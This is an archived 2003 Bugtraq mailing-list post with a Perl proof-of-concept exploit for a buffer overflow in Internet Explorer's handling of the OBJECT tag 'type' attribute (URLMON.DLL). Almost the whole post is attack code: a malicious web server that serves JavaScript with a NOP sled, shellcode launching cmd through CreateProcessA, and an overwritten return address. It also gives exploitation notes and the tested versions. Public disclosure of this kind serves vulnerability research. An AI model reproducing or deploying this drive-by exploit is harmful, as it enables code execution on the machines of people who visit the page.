NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2003-06

IE-object tag longtype exploit

From: Alumni (alumniok.kz)
Date: Fri Jun 06 2003 - 23:31:00 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

#!/usr/bin/perl

#=synopsis
# 06/06/03 - Proof of concept exploit by Sir Alumni (alumniok.kz)
# IE-Object longtype dynamic call oferflow
# [...]
# url://<$shellcode><'/'x48><jmp %ptr_sh>
# the flaw actually exists in URLMON.DLL when converting backslashes
# to wide char,
# this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
# [...]
#
# To exploit: i) start server perl script;
# ii) connect to http-service using IE/5.x.
# Tested: IE-5.x, 6.0? on WinXP.
# Note: a) the shellcode size is limited up to 56 bytes;
# b) the '$ret' may differ as well as the image base of
KERNEL32.DLL;
# c) to avoid multiple encoding the shellcode is given 'as
is' with help of JScript.
#=synopsis

use IO::Socket;

$port = 80;
$server = IO::Socket::INET->new (LocalPort => $port,
                                Type =>SOCK_STREAM,
                                Reuse => 1,
                                Listen => $port) or die("Couldnt't create
server socket\n");

$shellcode = "\x33\xdb". # xor ebx, ebx
                "\x8b\xd4". # mov edx, esp
                "\x80\xc6\xff". # add dh, 0xFF
                "\xc7\x42\xfc\x63\x6d". # mov dword ptr[edx-4], 0x01646D63
("cmd\x01")
                "\x64\x01". #
                "\x88\x5a\xff". # mov byte ptr[edx-1], bl
                "\x8d\x42\xfc". # lea eax, [edx-4]
                "\x8b\xf5". # mov esi, ebp
                "\x56\x52". # push esi; push edx
                "\x53\x53\x53\x53\x53\x53". # push ebx
                "\x50\x53". # push eax; push ebx
                "\xb8\x41\x77\xf7\xbf". # mov eax, 0xBFF77741 ~=
CreateProcessA
                "\xff\xd0". # call eax
                "\xb8\xf8\xd4\xf8\xbf". # mov eax, 0xBFF8D4F8 ~=
ExitProcess
                "\xff\xd0". # call eax
                "\xcc"; # int 3

$nop = "\x90";
$ret = "\\xAB\\x5D\\x58";

while ($client = $server->accept()) {
while (<$client>) {
if ($_ =~ /^(\x0D\x0A)/) {

print $client <<END_DATA;
HTTP/1.0 200 Ok\r
Content-Type: text/html\r
\r
<script>\r
        var mins = 56;\r
        var size = 48;\r
        var sploit = "$shellcode";\r
        var strNop = "$nop";\r
        var strObj = '<object type="';\r
        for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
        strObj += sploit;\r
        for (i=0;i<size;i++) strObj += '/';\r
        strObj += "CCCCCCCCDDDDDDDD";\r
        strObj += "$ret";\r
        strObj += '">Hello</object>';\r
        alert(strObj);\r
        document.write(strObj);\r
</script>\r
END_DATA
                        close($client);

}
}
}

close($server);

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]